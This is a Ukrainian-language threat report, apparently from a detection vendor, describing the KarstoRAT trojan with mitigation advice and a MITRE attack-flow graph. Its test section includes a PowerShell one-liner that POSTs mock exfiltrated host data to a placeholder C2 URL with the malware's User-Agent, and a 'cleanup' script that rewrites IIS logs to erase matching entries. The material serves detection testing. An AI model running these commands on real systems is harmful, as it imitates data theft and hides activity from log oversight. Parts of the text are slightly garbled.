Ближчий погляд на новий і непомітний шкідливий ПЗ KarstoRAT

Ruslan Mikhalov Керівник досліджень загроз у SOC Prime

Стежити

Ближчий погляд на новий і непомітний шкідливий ПЗ KarstoRAT

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

KarstoRAT – це нещодавно виявлений троян віддаленого доступу, що здатен збирати інформацію про систему, захоплювати аудіо- та відеопотоки з вебкамери, робити знімки екрану, вести реєстрацію натискань клавіш та красти токени автентифікації. Зловмисне програмне забезпечення підтримує стійкість, взаємодіє з командним сервером через HTTP за допомогою унікального користувацького агента та може отримувати додаткові корисні навантаження для подальших дій. Також містить функції, що порушують роботу, включаючи інверсію екрану та примусове відтворення аудіо.

Розслідування

Відділ SpiderLabs компанії LevelBlue досліджував потік виконання KarstoRAT, командно-керовані комунікації, процедури ексфільтрації та методи стійкості. У звіті виділяється нескінченна двосекундна петля, яка використовується для утримання зловмисного ПЗ у робочому стані, і описуються STARTUP_ON and STARTUP_OFF команди, що контролюють автоматичний запуск. Також дослідники задокументували здатність зловмисного ПЗ змінювати шпалери робочого столу та самостійно видалятися при команды.

Пом’якшення

Зусилля з виявлення повинні зосереджуватися на унікальному користувацькому агенті HTTP зловмисника, підозрілих реєстраційних записах, що стосуються запуску, та аномальній поведінці петлі процесу. Також захист кінцевих точок повинен відстежувати безфайлову активність, описану у звіті, та блокувати невідомі бінарні файли, доставлені через підробний маркетплейс Roblox.

Реагування

Якщо KarstoRAT виявлено, ізолюйте постраждалий пристрій, збережіть судово-медичні докази, включаючи HTTP-трафік та артефакти запуску, і видаліть всі механізми стійкості. Організації повинні змінити скомпрометовані облікові дані та продовжити моніторинг на наявність додаткових завантажених корисних навантажень після первинного компромета.

"graph TB %% Class definitions classDef action fill:#99ccff classDef persistence fill:#ffcc99 classDef credential fill:#ff9999 classDef collection fill:#ccffcc classDef discovery fill:#ccccff classDef impact fill:#ffb347 classDef defense fill:#d3d3d3 %% Node definitions action_user_execution["Дія – T1204.001 Виконання користувачем: Шкідливе посилання Жертва натискає на підробне посилання на маркетплейс Roblox (соціальна інженерія)."] class action_user_execution action persistence_boot_script["Стійкість – T1037 Скрипти ініціалізації завантаження чи входу Зловмисне програмне забезпечення реєструє себе в STARTUP_ON/OFF для автоматичного запуску при завантаженні чи вході."] class persistence_boot_script persistence credential_keylogging["Доступ до облікових даних – T1056.001 Захоплення вводу: Клавіатурний шпигун Зловмисне програмне забезпечення записує натискання клавіш для захоплення облікових даних та іншої конфіденційної інформації."] class credential_keylogging credential collection_screen_capture["Збирання – T1113 Захоплення екрану Зловмисне програмне забезпечення періодично робить знімки екрану робочого столу жертви."] class collection_screen_capture collection collection_audio_capture["Збирання – T1123 Захоплення аудіо Зловмисне програмне забезпечення записує аудіо з мікрофону системи."] class collection_audio_capture collection collection_video_capture["Збирання – T1125 Захоплення відео Зловмисне програмне забезпечення отримує доступ до вебкамери для запису відео жертви."] class collection_video_capture collection discovery_process["Відкриття – T1057 Відкриття процесів Зловмисне програмне забезпечення перераховує запущені процеси для ідентифікації засобів безпеки або цінних додатків."] class discovery_process discovery discovery_hardware["Відкриття – T1592.001 Збирання інформації про систему жертви: Аппаратне забезпечення Зловмисне програмне забезпечення збирає деталі про апаратне забезпечення, такі як CPU, RAM, і GPU."] class discovery_hardware discovery discovery_software["Відкриття – T1592.002 Збирання інформації про систему жертви: Програмне забезпечення Зловмисне програмне забезпечення збирає інформацію про версії встановленого програмного забезпечення та патчів."] class discovery_software discovery discovery_firmware["Відкриття – T1592.003 Збирання інформації про систему жертви: Мікропрограми Зловмисне програмне забезпечення витягає інформацію про мікропрограму та BIOS."] class discovery_firmware discovery discovery_config["Відкриття – T1592.004 Збирання інформації про систему жертви: Налаштування клієнта Зловмисне програмне забезпечення збирає налаштування конфігурації, такі як мова, часовий пояс та параметри мережі."] class discovery_config discovery impact_remote_desktop["Вплив – T1219.002 Програмне забезпечення віддаленого робочого столу Зловмисне програмне забезпечення використовує можливості віддаленого робочого столу для зміни фону робочого столу, перевертання екрана та зміни кнопок миші."] class impact_remote_desktop impact defense_self_destruct["Ухилення від захисту – T1027.005 Видалення індикаторів з інструментів Зловмисне програмне забезпечення самоу202Dзнищується та видаляє свої файли для стирання доказів."] class defense_self_destruct defense %% Connections action_user_execution –>|призводить до| persistence_boot_script persistence_boot_script –>|дозволяє| credential_keylogging credential_keylogging –>|дозволяє| collection_screen_capture collection_screen_capture –>|дозволяє| collection_audio_capture collection_audio_capture –>|дозволяє| collection_video_capture collection_video_capture –>|дозволяє| discovery_process discovery_process –>|призводить до| discovery_hardware discovery_hardware –>|призводить до| discovery_software discovery_software –>|призводить до| discovery_firmware discovery_firmware –>|призводить до| discovery_config discovery_config –>|дозволяє| impact_remote_desktop impact_remote_desktop –>|спрацьовує| defense_self_destruct "

Потік атаки

Опис нападу та команди:
Зловмисник отримав точку опори в мережі жертви і прагне встановити командно-керований канал для KarstoRAT. Для злиття з легітимним трафіком зловмисне програмне забезпечення використовує жорстко закодований рядок User-Agent “SecurityNotifier”. Зловмисник запускає однострічковий PowerShell на скомпрометованому хості, що здійснює HTTP POST-запит до сервера C2, вкладаючи заголовок UA. Запит включає невелике JSON-навантаження, яке імітує ексфільтровані дані, що є достатнім для виклику правила sigma.

Скрипт регресійного тесту:

# Імітація C2 KarstoRAT – PowerShell
$c2Url = "http://<webserver>/karsto_c2"
$payload = @{
    host = $env:COMPUTERNAME
    data = "sample exfiltrated data"
} | ConvertTo-Json

$headers = @{
    "User-Agent" = "SecurityNotifier"
    "Content-Type" = "application/json"
}

try {
    Invoke-WebRequest -Uri $c2Url `
                      -Method POST `
                      -Headers $headers `
                      -Body $payload `
                      -UseBasicParsing
    Write-Host "C2-запит відправлено."
} catch {
    Write-Error "Не вдалося відправити C2-запит: $_"
}

Команди очищення:

# Видалення згенерованого запиту з журналів IIS (потребує прав адміністратора)
$logPath = "C:inetpublogsLogFilesW3SVC1"
Get-ChildItem -Path $logPath -Filter "*.log" | ForEach-Object {
    (Get-Content $_.FullName) |
        Where-Object { $_ -notmatch "SecurityNotifier" } |
        Set-Content $_.FullName
}
Write-Host "Журнали очищено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно